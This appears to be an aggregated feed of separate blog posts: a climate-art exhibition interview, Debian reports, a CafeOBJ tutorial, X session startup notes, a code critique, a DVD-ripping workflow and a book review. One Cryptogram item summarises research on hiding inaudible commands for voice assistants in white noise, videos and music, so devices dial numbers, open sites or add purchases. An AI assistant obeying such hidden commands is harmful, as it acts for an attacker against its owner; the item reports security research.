“The arts can play a role of fleshing out social scenarios showing that other worlds are possible, and that we are going to be living in them,” de Vicente wrote recently. “Imagining other forms of living is key to producing them.”

Scenes from “After the End of the World.” Via CCCB.

The forms of living on display at Després de la fi del món are an immersive, multi-sensory confrontation. The show consists of nine scenes, each a chapter in a spatial essay on the present and future of the climate crisis by some of the foremost artists and thinkers contemplating the implications of the anthropocene.

“Mitigation of Shock” by Superflux. Via CCCB.

In one, I find myself in a London apartment in the year 02050.¹ The familiar confines of cookie-cutter IKEA furniture give way to an unsettling feeling as the radio on the kitchen counter speaks of broken food supply chains, price hikes, and devastating hurricanes. A newspaper on the living room table asks “HOW WILL WE EAT?” The answer is littered throughout the apartment, in the form of domestic agriculture experiments glowing under purple lights, improvised food computers, and recipes for burgers made out of flies.

“Overview” by Benjamin Grant. Via Daily Overview.

In another, I am surrounded by satellite imagery of the Earth that reveals the beauty of human-made systems and their impact on the planet.

“Win><Win” by Rimini Protokoll. Via CCCB.

The most radical scene, Rimini Protokoll’s “Win><Win,” is one de Vicente has asked me not to disclose in detail, so as to not ruin the surprise when Després de la fi del món goes on tour in the United Kingdom and Singapore. All I can say is that it has something to do with jellyfish, and that it is one of the most remarkable pieces of interactive theater I have ever seen.

A “decompression chamber” featuring philosopher Timothy Morton. Via CCCB.

Visitors transition between scenes via waiting rooms that de Vicente describes as “decompression chambers.” In each chamber, the Minister Of The Future, played by philosopher Timothy Morton, frames his program. The Minister claims to represent the interests of those who cannot exert influence on the political process, either because they have not yet been born, or because they are non-human, like the Great Barrier Reef.

“Aerocene” by Tomás Seraceno. Via Aerocene Foundation.

A key thesis of Després de la fi del món is that knowing the scientific facts of climate change is not enough to adequately address its challenges. One must be able to feel its emotional impact, and find the language to speak about it.

My fear—and the reason I go “full ostrich”—has long been that such a feeling would come about only once we experience climate change’s deleterious effects as an irrevocable part of daily life. My hope, after attending the exhibition and speaking with José Luis de Vicente, is that it might come, at least in part, through art.


“This Civilization is Over. And Everybody Knows It.”

The following interview has been edited for length and clarity.

AHMED KABIL: I suspect that for a lot of us, when we think about climate change, it seems very distant — both in terms of time and space. If it’s happening, it’s happening to people over there, or to people in the future; it’s not happening over here, or right now. The New York Times, for example, published a story finding that while most in the United States think that climate change will harm Americans, few believe that it will harm them personally. One of the things that I found most compelling about Després de la fi del món was how the different scenes of the exhibition made climate change feel much more immediate. Could you say a little bit about how the show was conceived and what you hoped to achieve?

José Luis de Vicente. Photo by Ahmed Kabil.

JOSÉ LUIS DE VICENTE: We wanted the show to be a personal journey, but not necessarily a cohesive one. We wanted it to be like a hallucination, like the recollection of a dream where you’re picking up the pieces here and there.

We didn’t want to do a didactic, encyclopedic show on the science and challenge of climate change. Because that show has been done many, many times. And also, we thought the problem with the climate crisis is not a problem of information. We don’t need to be told more times things that we’ve been told thousands of times.

“Unravelled” by Unknown Fields Division. Via CCCB.

We wanted something that would address the elephant in the room. And the elephant in the room for us was: if this is the most important crisis that we face as a species today, if it transcends generations, if this is going to be the background crisis of our lives, why don’t we speak about it? Why don’t we know how to relate to it directly? Why does it not lead newspapers in five columns when we open them in the morning? That emotional distance was something that we wanted to investigate.

One of the reasons that distance happens is because we’re living in a kind of collective trauma. We are still in the denial phase of that trauma. The metaphor I always like to use is, our position right now is like the one you’re in when you go to the doctor, and the doctor gives you a diagnosis saying that actually, there’s a big, big problem, and yet you still feel the same. You don’t feel any different after being given that piece of news, but at the same time intellectually you know at that point that things are never going to be the same. That’s where we are collectively when it comes to climate change. So how do we transition out of this position of trauma to one of empathy?

“Win><Win” by Rimini Protokoll. Via CCCB.

We also wanted to look at why this was politically an unmanageable crisis. And there’s two reasons for that. One is because it’s a political message no politician will be able to channel into a marketable idea, which is: “We cannot go on living the way we live.” There is no political future for any way you market that idea.

The other is—and Timothy Morton’s work was really influential in this idea—the notion that: “What if simply our senses and communicative capacities are not tuned to understanding the problem because it moves in a different resolution, because it proceeds on a scale that is not the scale of our senses?”

Morton’s notion of the hyper-object—this idea that there are things that are too big and move too slow for us to see—was very important. The title of the show comes from the title of his book Hyperobjects: An Ecology of Nature After the End of the World (02013).

AHMED KABIL: One of the recent instances of note where climate change did make front-page news was the 02015 Paris Agreement. In Després de la fi del món, the Paris Agreement plays a central role in framing the future of climate change. Why?

JOSÉ LUIS DE VICENTE: If we follow the Paris Agreement to its final consequences, what it’s saying is that, in order to prevent global temperature from rising from 3.6 to 4.8 median degrees Celsius by the end of the 21st century, we have to undertake the biggest transformation that we’ve ever done. And even doing that will mean that we’re only halfway to our goal of having global temperatures not rise more than 2 degrees, ideally 1.5, and we’re already at 1 degree. So that gives a sense of the challenge. And we need to do it for the benefit of the humans and non-humans of 02100, who don’t have a say in this conversation.

“Overview” by Benjamin Grant. Via CCCB.

There are two possibilities here: either we make the goals of the Paris Agreement—the bad news here being that this problem is much, much bigger than just replacing fossil fuels with renewable energies. The Tesla way of going at it, of replacing every car in the world with a Tesla—the numbers just don’t add up. We’re going to have to rethink most systems in society to make this a possibility. That’s possibility number one.

Possibility number two: if we don’t make the goals of the Paris Agreement, we know that there’s no chance that life in the end of the 21st century is going to look remotely similar to today. We know that the kind of systemic crises we have are way more serious than the ones that would allow essential normalcy as we understand it today. So whether we make the goals of the Paris Agreement or not, there is no way that life in the second part of the 21st century looks as it does today.

That’s why we open the exhibition with McKenzie Wark’s quote.

“This civilization is over. And everybody knows it.” — McKenzie Wark

This civilization is over, not in the apocalyptic sense that the end of the world is coming, but that the civilization we built from the mid-nineteenth century onward on this capacity of taking fossil fuels out of the Earth and turning that into a labor force and turning that into an equation of “growth equals development equals progress” is just not sustainable.

“Environmental Health Clinic” by Natalie Jeremijenko. Via CCCB.

So with all these reference points, the show asks: What does it mean to understand this story? What does it mean to be citizens acknowledging this reality? What are possible scenes that look at either aspects of the anthropocene planet today or possible post-Paris futures?

This show should mean different things for you whether you’re fifty-five or you’re twelve. Because if you’re fifty-five, these are all hypothetical scenarios for a world that you’re not going to see. But if you’re twelve this is the world that you’re going to grow up into.

02100 may seem very far away, but the people who will see the world of 02100 are already born.

AHMED KABIL: What role will technology play in our climate change future?

JOSÉ LUIS DE VICENTE: Technology will, of course, play a role, but I think we have to be non-utopian about what that role will be.

The climate crisis is not a technological or socio-cultural or political problem; it’s all three. So the problem can only be solved at the three axes. The one that I am less hopeful about is the political axis, because how do we do it? How do we break that cycle of incredibly short-term incentives built into the political power structure? How do we incorporate the idea of: “Okay, what you want as my constituent is not the most important thing in the world, so I cannot just give you what you want if you vote for me and my position of power.” Especially when we’re seeing the collapse of systems and mechanisms of political representation.

“Sea State 9: Proclamation” by Charles Lim. Via CCCB.

I want to believe—and I’m not a political scientist—that huge social transformations translate to political redesigns, in spite of everything. I’m not overly optimistic or utopian about where we are right now. But our capacity to coalesce and gather around powerful ideas that transmit very easily to the masses allows for shifts of paradigm better than previously. Not only good ones, but bad ones as well.

AHMED KABIL: Is there a case for optimism on climate change?

JOSÉ LUIS DE VICENTE: I cannot be optimistic looking at the data on the table and the political agendas, but I am in the sense of saying that incredible things are happening in the world. We’re witnessing a kind of political awakening. These huge social shifts can happen at any moment.

And I think, for instance, that the fossil fuel industry knows that it’s the end of the party. What we’re seeing now is their awareness that their business model is not going to be viable for much longer. And obviously neither Putin nor Trump are good news for the climate, but nevertheless these huge shifts are coming.

“Mitigation of Shock” by Superflux. Via CCCB.

Kim Stanley Robinson always mentions this “pessimism of the intellect, optimism of the will.” I think that’s where you need to be, knowing that big changes are possible. Of course, I have no utopian expectations about it—this is going to be the backstory for the rest of our lives and we’re going to have traumatic, sad things happening because they’re already happening. But I’m quite positive that the world will definitely not look like this one in many aspects, and many things that big social revolutions in the past tried to make possible will be made possible.

If this show has done anything I hope it’s made a small contribution in answering the question of how we think about the future of climate change, how we talk about it, and how we understand what it means. We have to exist on timescales more expansive than the tiny units of time of our lives. We have to think of the world in ways that are non-anthropocentric. We have to think that the needs and desires of the humans of now are not the only thing that matters. That’s a huge philosophical revolution. But I think it’s possible.


Notes

[1] The Long Now Foundation uses five digit dates to serve as a reminder of the time scale that we endeavor to work in. Since the Clock of the Long Now is meant to run well past the Gregorian year 10,000, the extra zero is to solve the deca-millennium bug which will come into effect in about 8,000 years.

Learn More

  • Stay updated on the After The End of The World exhibition.
  • Read The Guardian’s 02015 profile of Timothy Morton.
  • Watch Benjamin Grant’s upcoming Seminar About Long-Term Thinking, “Overview: Earth and Civilization in the Macroscope.”
  • Watch Kim Stanley Robinson’s 02016 talk at The Interval At Long Now on how climate will evolve government and society.
  • Read José Luis de Vicente’s interview with Kim Stanley Robinson.

Planet DebianRaphaël Hertzog: Freexian’s report about Debian Long Term Support, April 2018

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In April, about 183 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 5 hours (out of 10 hours allocated, thus keeping 5 extra hours for May).
  • Antoine Beaupré did 12h.
  • Ben Hutchings did 17 hours (out of 15h allocated + 2 remaining hours).
  • Brian May did 10 hours.
  • Chris Lamb did 16.25 hours.
  • Emilio Pozuelo Monfort did 11.5 hours (out of 16.25 hours allocated + 5 remaining hours, thus keeping 9.75 extra hours for May).
  • Holger Levsen did nothing (out of 16.25 hours allocated + 16.5 hours remaining, thus keeping 32.75 extra hours for May). He did not get hours allocated for May and is expected to catch up.
  • Hugo Lefeuvre did 20.5 hours (out of 16.25 hours allocated + 4.25 remaining hours).
  • Markus Koschany did 16.25 hours.
  • Ola Lundqvist did 11 hours (out of 14 hours allocated + 9.5 remaining hours, thus keeping 12.5 extra hours for May).
  • Roberto C. Sanchez did 7 hours (out of 16.25 hours allocated + 15.75 hours remaining, but immediately gave back the 25 remaining hours).
  • Santiago Ruano Rincón did 8 hours.
  • Thorsten Alteholz did 16.25 hours.

Evolution of the situation

The number of sponsored hours did not change. But a few sponsors interested in having more than 5 years of support should join LTS next month since this was a pre-requisite to benefit from extended LTS support. I did update Freexian’s website to show this as a benefit offered to LTS sponsors.

The security tracker currently lists 20 packages with a known CVE and the dla-needed.txt file 16. At two weeks from Wheezy’s end-of-life, the number of open issues is close to an historical low.

Thanks to our sponsors

New sponsors are in bold.


Planet DebianNorbert Preining: Specification and Verification of Software with CafeOBJ – Part 3 – First steps with CafeOBJ

This blog continues Part 1 and Part 2 of our series on software specification and verification with CafeOBJ.

We will go through basic operations like starting and stopping the CafeOBJ interpreter, getting help, doing basic computations.

Starting and leaving the interpreter

If CafeOBJ is properly installed, a call to cafeobj will greet you with information about the current version of CafeOBJ, as well as build dates and which build system has been used. The following is what is shown on my Debian system with the latest version of CafeOBJ installed:

$ cafeobj
-- loading standard prelude

            -- CafeOBJ system Version 1.5.7(PigNose0.99) --
                   built: 2018 Feb 26 Mon 6:01:31 GMT
                         prelude file: std.bin
                                  ***
                      2018 Apr 19 Thu 2:20:40 GMT
                            Type ? for help
                                  ***
                  -- Containing PigNose Extensions --
                                  ---
                             built on SBCL
                             1.4.4.debian
CafeOBJ>

After the initial information there is the prompt CafeOBJ> indicating that the interpreter is ready to process your input. By default several files (the prelude, as it is called above) are loaded, which define certain basic sorts and operations.

If you have enough of playing around, simply press Ctrl-D (the Control key and d at the same time), or type in quit:

CafeOBJ> quit
$

Getting help

Besides the extensive documentation available at the website (reference manual, user manual, tutorials, etc), the reference manual is also always at your fingertips within the CafeOBJ interpreter using the ? group of commands:

  • ? – gives general help
  • ?com class – shows available commands classified by ‘class’
  • ? name – gives the reference manual entry for name
  • ?ex name – gives examples (if available) for name
  • ?ap name – (apropos) searches the reference manual for appearances of name

To give an example of the usage, let us search for the term operator and then look at the documentation concerning one of the matches:

CafeOBJ> ?ap op
Found the following matches:
 . `:theory <op_name> : <arity> -> <coarity> { assoc | comm | id: <term> }`
...
 . `op <op_name> : <arity> -> <coarity> { <attributes> }`
 . on-the-fly declaration
...

CafeOBJ> ? op
`op <op_name> : <arity> -> <coarity> { <attributes> }`
Defines an operator by its domain, co-domain, and the term construct.
`<arity>` is a space separated list of sort names, `<coarity>` is a
single sort name.
...

I have shortened the output a bit, indicated by ....

Simple computations

By default, CafeOBJ is just a barren landscape, meaning that there are no rules or axioms active. Everything is encapsulated into so-called modules (which in mathematical terms are definitions of order-sorted algebras). One of these modules is NAT which allows computations in the natural numbers. To activate a module we use open:

CafeOBJ> open NAT .
...
%NAT>

The ... again indicate quite some output of the CafeOBJ interpreter loading additional files.

There are two things to note in the above:

  • One finishes a command with a literal dot . – this is necessary due to the completely free syntax of the CafeOBJ language and indicates the end of a statement, similar to semicolons in other programming languages.
  • The prompt has changed to %NAT> to indicate that the playground (context) we are currently working in is the natural numbers.

To actually carry out computations we use the command red or reduce. Recall from the previous post that the computational model of CafeOBJ is rewriting, and in this setting reduce means kicking off the rewrite process. Let us do this for a simple computation:

%NAT> red 2 + 3 * 4 .
-- reduce in %NAT : (2 + (3 * 4)):NzNat
(14):NzNat
(0.0000 sec for parse, 0.0000 sec for 2 rewrites + 2 matches)

%NAT>

Things to note in the above output:

  • Correct operator precedence: CafeOBJ correctly computes 14 due to the proper use of operator precedence. If you want to override the parsing you can use additional parentheses.
  • CafeOBJ even gives a sort (or type) information for the return value: (14):NzNat, indicating that the return value of 14 is of sort NzNat, which refers to non-zero natural numbers.
  • The interpreter tells you how much time it spent in parsing and rewriting.

If we have enough of this playground, we close the opened module with close which returns us to the original prompt:

%NAT> close .
CafeOBJ>

Now if you think this is not so interesting, let us do some more funny things, like computations with rational numbers, which are provided by CafeOBJ in the RAT module. Rational numbers can be written as slashed expressions: a / b. If we don’t want to actually reduce a given expression, we can use parse to tell CafeOBJ to parse the next expression and give us the parsed expression together with a sort:

CafeOBJ> open RAT .
...
%RAT> parse 3/4 .
(3/4):NzRat
%RAT>

Again, CafeOBJ correctly determined that the given value is a non-zero rational number. More complex expressions can be parsed the same way, as well as reduced to a minimal representation:

%RAT> parse 2 / ( 4 * 3 ) .
(2 / (4 * 3)):NzRat

%RAT> red 2 / ( 4 * 3 ) .
-- reduce in %RAT : (2 / (4 * 3)):NzRat
(1/6):NzRat
(0.0000 sec for parse, 0.0000 sec for 2 rewrites + 2 matches)

%RAT>

NAT and RAT are not the only built-in sorts, there are several more, and others can be defined easily (see next blog). The currently available data types, together with their sort order (recall that we are in order sorted algebras, so one sort can contain others):
NzNat < Nat < NzInt < Int < NzRat < Rat
which refer to non-zero natural numbers, natural numbers, non-zero integers, integers, non-zero rational numbers, rational numbers, respectively.

Then there are other data types unrelated (not ordered) to any other:
Triv, Bool, Float, Char, String, 2Tuple, 3Tuple, 4Tuple.

Functions

CafeOBJ does not have functions in the usual sense, but operators defined via their arity and a set of (rewriting) equations. Let us take a look at two simple functions on the natural numbers: square, which takes one argument and returns the square of it, and a function sos, which takes two arguments and returns the sum of the squares of the arguments. In mathematical writing: square(a) = a * a and sos(a,b) = a*a + b*b.

This can be translated into CafeOBJ code as follows (from now on I will be leaving out the prompts):

open NAT .
vars A B : Nat
op square : Nat -> Nat .
eq square(A) = A * A .
op sos : Nat Nat -> Nat .
eq sos(A, B) = A * A + B * B .

This first declares two variables A and B to be of sort Nat (note that the module names and sort names are not the same, but the module names are usually the uppercase of the sort names). Then the operator square is introduced by providing its arity. In general an operator can have several input variables, and for each of them as well as the return value we have to provide the sorts:

  op  NAME : Sort1 Sort2 ... -> Sort

defines an operator NAME with several input parameters of the given sorts, and the return sort Sort.

The next line gives one (the only necessary) equation governing the computation rules of square. Equations are introduced by eq (and some variants of it), followed by an expression, an equal sign, and another expression. This indicates that CafeOBJ may rewrite the left expression to the right expression.

In our case we told CafeOBJ that it may rewrite an expression of the form square(A) to A * A, where A can be anything of sort Nat (for now we don't go into details how order-sorted rewriting works in general).

The next two lines do the same for the operator sos.

Having this code in place, we can easily do computations with it by using the already introduced reduce command:

red square(10) .
-- reduce in %NAT : (square(10)):Nat
(100):NzNat

red sos(10,20) .
-- reduce in %NAT : (sos(10,20)):Nat
(500):NzNat

What to do if one equation does not suffice? Let us look at a typical recursive definition of the sum of natural numbers: sum(0) = 0 and for a > 0 we have sum(a) = a + sum(a-1). This can be easily translated into CafeOBJ as follows:

open NAT .
op sum : Nat -> Nat .
eq sum(0) = 0 .
eq sum(A:NzNat) = A + sum(p A) .
red sum(10) .

where p (for predecessor) indicates the next smaller natural number. This operator is only defined on non-zero natural numbers, though.

In the above fragment we also see a new style of declaring variables, on the fly: The first occurrence of a variable in an equation can carry a sort declaration, which extends all through the equation.

Running the above code we get, not surprisingly, 55; in particular:

-- reduce in %NAT : (sum(10)):Nat
(55):NzNat
(0.0000 sec for parse, 0.0000 sec for 31 rewrites + 41 matches)

As a challenge the reader might try to give definitions of the factorial function and the Fibonacci function, the next blog will present solutions for it.


This concludes the third part. In the next part we will look at defining modules (aka algebras aka theories) and use them to define lists.

Planet DebianEnrico Zini: Starting user software in X

There are currently many ways of starting software when a user session starts.

This is an attempt to collect a list of pointers to piece the big picture together. It's partial and some parts might be imprecise or incorrect, but it's a start, and I'm happy to keep it updated if I receive corrections.

x11-common

man xsession

  • Started by the display manager; for example, /usr/share/lightdm/lightdm.conf.d/01_debian.conf or /etc/gdm3/Xsession
  • Debian specific
  • Runs scripts in /etc/X11/Xsession.d/
  • /etc/X11/Xsession.d/40x11-common_xsessionrc sources ~/.xsessionrc which can do little more than set env vars, because it is run at the beginning of X session startup
  • At the end, it starts the session manager (gnome-session, xfce4-session, and so on)

systemd --user

  • https://wiki.archlinux.org/index.php/Systemd/User
  • Started by pam_systemd, so it might not have a DISPLAY variable set in the environment yet
  • Manages units in:
    • /usr/lib/systemd/user/ where units provided by installed packages belong.
    • ~/.local/share/systemd/user/ where units of packages that have been installed in the home directory belong.
    • /etc/systemd/user/ where system-wide user units are placed by the system administrator.
    • ~/.config/systemd/user/ where the users put their own units.
  • A trick to start a systemd user unit when the X session has been set up and the DISPLAY variable is available, is to call systemctl start from a .desktop autostart file.
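A minimal sketch of such an autostart file (the unit name here is just a placeholder), dropped into ~/.config/autostart/, could look like this:

[Desktop Entry]
Type=Application
Name=Start my-unit
Exec=systemctl --user start my-unit.service
NoDisplay=true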

dbus activation

X session manager

xdg autostart

Other startup notes

~/.Xauthority

To connect to an X server, a client needs to send a token from ~/.Xauthority, which proves that it can read the user's private data.

~/.Xauthority contains a token generated by the display manager and communicated to X at startup.

To view its contents, use xauth -i -f ~/.Xauthority list
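As an aside (a sketch, not part of the original notes), xauth can also export such a token and merge it into another authority file, which is how the credential can be handed to another user or host; the file names here are placeholders:

xauth extract /tmp/xcookie "$DISPLAY"
xauth -f /path/to/other/Xauthority merge /tmp/xcookie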

CryptogramSending Inaudible Commands to Voice Assistants

Researchers have demonstrated the ability to send inaudible commands to voice assistants like Alexa, Siri, and Google Assistant.

Over the last two years, researchers in China and the United States have begun demonstrating that they can send hidden commands that are undetectable to the human ear to Apple's Siri, Amazon's Alexa and Google's Assistant. Inside university labs, the researchers have been able to secretly activate the artificial intelligence systems on smartphones and smart speakers, making them dial phone numbers or open websites. In the wrong hands, the technology could be used to unlock doors, wire money or buy stuff online ­-- simply with music playing over the radio.

A group of students from University of California, Berkeley, and Georgetown University showed in 2016 that they could hide commands in white noise played over loudspeakers and through YouTube videos to get smart devices to turn on airplane mode or open a website.

This month, some of those Berkeley researchers published a research paper that went further, saying they could embed commands directly into recordings of music or spoken text. So while a human listener hears someone talking or an orchestra playing, Amazon's Echo speaker might hear an instruction to add something to your shopping list.

Worse Than FailureCodeSOD: A Bit Masked

The “for-case” or “loop-switch” anti-pattern creates some hard to maintain code. You know the drill: the first time through the loop, do one step, the next time through the loop, do a different step. It’s known as the “Anti-Duff’s Device”, which is a good contrast: Duff’s Device is a clever way to unroll a loop and turn it into a sequential process, while the “loop-switch” takes a sequential process and turns it into a loop.

Ashlea inherited an MFC application. It was worked on by a number of developers in Germany, some of whom used English to name identifiers and some of whom used German, creating a new language called “Deunglish”. Or “Engleutch”? Whatever you call it, Ashlea has helpfully translated all the identifiers into English for us.

Buried deep in a thousand-line “do everything” method, there’s this block:

if(IS_SOMEFORMATNAME()) //Mantis 24426
{
  if(IS_CONDITION("RELEASE_4"))
  {
    m_BAR.m_TLC_FIELDS.DISTRIBUTIONCHANNEL="";
    CString strKey;
    for (unsigned int i=1; i<16; i++) // Test all combinations
    {
      strKey="#W#X#Y#Z";
      if(i & 1)
        strKey.Replace("#W", m_strActualPromo);  // MANTIS 45587: Search with and without promotion code
      if(i & 2)
        strKey.Replace("#X",m_BAR.m_TLC_FIELDS.OBJECTCODE);
      if(i & 4)
        strKey.Replace("#Y",TOKEN(strFoo,H_BAZCODE));
      if(i & 8)
        strKey.Replace("#Z",TOKEN(strFoo,H_CHAIN));

      strKey.Replace("#W","");
      strKey.Replace("#X","");
      strKey.Replace("#Y","");
      strKey.Replace("#Z","");

      if(m_lDistributionchannel.GetFirst(strKey))
      {
        m_BAR.m_TLC_FIELDS.DISTRIBUTIONCHANNEL="R";
        break;
      }
    }
  }
  else
    m_BAR.m_TLC_FIELDS.DISTRIBUTIONCHANNEL=m_lDistributionchannel.GetFirstLine(m_BAR.m_TLC_FIELDS.OBJECTCODE+m_strActualPromo);
}

Here, we see a rather unique approach to the for-case: using bitmasks to combine steps on each iteration of the loop. From what I can tell, they have four things which can combine to make an identifier, but which might get combined in many different ways. So they try every possible combination, and if it exists, they can set the DISTRIBUTIONCHANNEL field.

That’s ugly and awful, and certainly a WTF, but honestly, that’s not what leapt out to me. It was this line:

if(IS_CONDITION("RELEASE_4"))

It’s quite clear that, as new versions of the software were released, they needed to control which features were enabled and which weren’t. This is probably related to a database, and thus the database may or may not be upgraded to the same release version as the code. So scattered throughout the code are checks like this, which enable blocks of code at runtime based on which versions match with these flags.

Debugging that must be a joy.

[Advertisement] Forget logs. Next time you're struggling to replicate error, crash and performance issues in your apps - Think Raygun! Installs in minutes. Learn more.

Planet DebianWouter Verhelst: Digitizing my DVDs

I have a rather sizeable DVD collection. The database that I created of them a few years back after I'd had a few episodes where I accidentally bought the same movie more than once claims there's over 300 movies in the cabinet. Additionally, I own a number of TV shows on DVD, which, if you count individual disks, will probably end up being about the same number.

A few years ago, I decided that I was tired of walking to the DVD cabinet, taking out a disc, and placing it in the reader. That instead, I wanted to digitize them and use kodi to be able to watch a movie whenever I felt like it. So I made some calculations, and came up with a system with enough storage (on ZFS, of course) to store all the DVDs without needing to re-encode them.

I got started on ripping most of the DVDs using dvdbackup, but it quickly became apparent that I'd made a miscalculation; where I thought that most of the DVDs would be 4.7G ones, it turns out that most commercial DVDs are actually of the 9G type. Come to think of it, that does make a lot of sense. Additionally, now that I had a home server that had some significant redundant storage, I found that I had some additional uses for such things. The storage that I had, vast enough though it may be, wouldn't suffice.

So, I gave this some more thought, but then life interfered and nothing happened for a few years.

Recently however, I've picked it up again, changing my workflow. I started using handbrake to re-encode the DVDs so they wouldn't take up quite so much space; having chosen VP9 as my preferred codec, I end up storing the DVDs as about 1 to 2 G per main feature, rather than the 8 to 9 that it used to be -- a significant gain. However, my first workflow wasn't very efficient; I would run the handbrake GUI from my laptop on ssh -X sessions to multiple machines, encoding the videos directly from DVD that way. That worked, but it meant I couldn't shut down my laptop to take it to work without interrupting work that was happening; also, it meant that if a DVD finished encoding in the middle of the night, I wouldn't be there to replace it, so the system would be sitting idle for several hours. Clearly some form of improvement was necessary if I was going to do this in any reasonable amount of time.

So after fooling around a bit, I came up with the following:

  • First, I use dvdbackup -M -r a to read the DVD without re-encoding anything. This can be done at the speed of the optical medium, and can therefore be done much more efficiently than to use handbrake directly from the DVD. The -M option tells dvdbackup to read everything from the DVD (to make a mirror of it, in effect). The -r a option tells dvdbackup to abort if it encounters a read error; I found that DVDs sometimes can be read successfully if I eject the drive and immediately reinsert it, or if I give the disk another clean, or even just try again in a different DVD reader. Sometimes the disk is just damaged, and then using dvdbackup's default mode of skipping the unreadable blocks makes sense, but not in a first attempt.
  • Then, I run a small little perl script that I wrote. It basically does two things:

    1. Run HandBrakeCLI -i <dvdbackup output> --previews 1 -t 0, parse its stderr output, and figure out what the first and the last titles on the DVD are.
    2. Run qsub -N <movie name> -v FILM=<dvdbackup output> -t <first title>-<last title> convert-film
  • The convert-film script is a bash script, which (in its first version) did this:

    mkdir -p "$OUTPUTDIR/$FILM/tmp"
    HandBrakeCLI -x "threads=1" --no-dvdnav -i "$INPUTDIR/$FILM" -e vp9 -E copy -T -t $SGE_TASK_ID --all-audio --all-subtitles -o "$OUTPUTDIR/$FILM/tmp/T${SGE_TASK_ID}.mkv"
    

    Essentially, that converts a single title to a VP9-encoded matroska file, with all the subtitles and audio streams intact, and forcing it to use only one thread -- having it use multiple threads is useful if you care about a single DVD converting as fast as possible, but I don't, and having four DVDs on a four-core system all convert at 100% CPU seems more efficient than having two convert at about 180% each. I did consider using HandBrakeCLI's options to only extract the "interesting" audio and subtitle tracks, but I prefer to not have dubbed audio (to have subtitled audio instead); since some of my DVDs are originally in non-English languages, doing so gets rather complex. The audio and subtitle tracks don't take up that much space, so I decided not to bother with that in the end.

The use of qsub, which submits the script into gridengine, allows me to hook up several encoder nodes (read: the server plus a few old laptops) to the same queue.

That went pretty well, until I wanted to figure out how far along something was going. HandBrakeCLI provides progress information on stderr, and I can just do a tail -f of the stderr output logs, but that really works well only for one DVD at a time, not if you're trying to follow along with about a dozen of them.

So I made a database, and wrote another perl script. This latter will parse the stderr output of HandBrakeCLI, fish out the progress information, and put the completion percentage as well as the ETA time into a database. Then it became interesting:

CREATE OR REPLACE FUNCTION transjob_tcn() RETURNS trigger AS $$
BEGIN
  IF (TG_OP = 'INSERT') OR (TG_OP = 'UPDATE' AND (NEW.progress != OLD.progress) OR NEW.finished = TRUE) THEN
    PERFORM pg_notify('transjob', row_to_json(NEW)::varchar);
  END IF;
  RETURN NEW;
END;
$$ LANGUAGE plpgsql;
CREATE TRIGGER transjob_tcn_trigger
  AFTER INSERT OR UPDATE ON transjob
  FOR EACH ROW EXECUTE PROCEDURE transjob_tcn();

This uses PostgreSQL's asynchronous notification feature to send out a notification whenever an interesting change has happened to the table.
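(If you want to watch those notifications by hand before writing any code, plain psql can do it; this is standard PostgreSQL rather than part of the setup above:)

LISTEN transjob;
-- every later INSERT or UPDATE on transjob that fires the trigger now shows
-- up in this session as an asynchronous notification whose payload is the
-- row encoded as JSON.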

#!/usr/bin/perl -w

use strict;
use warnings;

use Mojolicious::Lite;
use Mojo::Pg;

...

helper dbh => sub { state $pg = Mojo::Pg->new->dsn("dbi:Pg:dbname=transcode"); };

websocket '/updates' => sub {
    my $c = shift;
    $c->inactivity_timeout(600);
    my $cb = $c->dbh->pubsub->listen(transjob => sub { $c->send(pop) });
    $c->on(finish => sub { shift->dbh->pubsub->unlisten(transjob => $cb) });
};

app->start;

This uses the Mojolicious framework and Mojo::Pg to send out the payload of the "transjob" notification (which we created with the FOR EACH ROW trigger inside PostgreSQL earlier, and which contains the JSON version of the table row) over a WebSocket. Then it's just a small matter of programming to write some javascript which dynamically updates the webpage whenever that happens, and Tadaa! I have an online overview of the videos that are transcoding, and how far along they are.

That only requires me to keep the queue non-empty, which I can easily do by running dvdbackup a few times in parallel every so often. That's a nice Saturday afternoon project...

Planet DebianReproducible builds folks: Reproducible Builds: Weekly report #159

Here’s what happened in the Reproducible Builds effort between Sunday May 6 and Saturday May 12 2018:

Packages reviewed and fixed, and bugs filed

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 94 was uploaded to Debian unstable and PyPI by Chris Lamb. It included contributions already covered by posts in previous weeks as well as new ones from:

Mattia Rizzolo subsequently backported this version to stretch.

After the release of version 94, the development continued with the following contributions from Mattia Rizzolo:

disorderfs development

Version 0.5.3-1 of disorderfs (our FUSE-based filesystem that introduces non-determinism) was uploaded to unstable by Chris Lamb. It included contributions already covered by posts in previous weeks as well as new ones from:

jenkins.debian.net development

Mattia Rizzolo made the following changes to our Jenkins-based testing framework, including:

Misc.

This week’s edition was written by Bernhard M. Wiedemann, Chris Lamb, Mattia Rizzolo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Planet DebianRuss Allbery: Review: Thanks for the Feedback

Review: Thanks for the Feedback, by Douglas Stone & Sheila Heen

Publisher: Penguin
Copyright: 2014
Printing: 2015
ISBN: 1-101-61427-7
Format: Kindle
Pages: 322

Another book read for the work book club.

I was disappointed when this book was picked. I already read two excellent advice columns (Captain Awkward and Ask a Manager) and have read a lot on this general topic. Many workplace-oriented self-help books also seem to be full of a style of pop psychology that irritates me rather than informs. But the point of a book club is that you read the book anyway, so I dove in. And was quite pleasantly surprised.

This book is about receiving feedback, not about giving feedback. There are tons of great books out there about how to give feedback, but, as the authors say in the introduction, almost no one giving you feedback is going to read any of them. It would be nice if we all got better at giving feedback, but it's not going to happen, and you can't control other people's feedback styles. You can control how you receive feedback, though, and there's quite a lot one can do on the receiving end. The footnoted subtitle summarizes the tone of the book: The Science and Art of Receiving Feedback Well (even when it is off base, unfair, poorly delivered, and, frankly, you're not in the mood).

The measure of a book like this for me is what I remember from it several weeks after reading it. Here, it was the separation of feedback into three distinct types: appreciation, coaching, and evaluation. Appreciation is gratitude and recognition for what one has accomplished, independent of any comparison against other people or an ideal for that person. Coaching is feedback aimed at improving one's performance. And evaluation, of course, is feedback that measures one against a standard, and usually comes with consequences (a raise, a positive review, a relationship break-up). We all need all three but different people need different mixes, sometimes quite dramatically so. And one of the major obstacles in the way of receiving feedback well is that they tend to come mixed or confused.

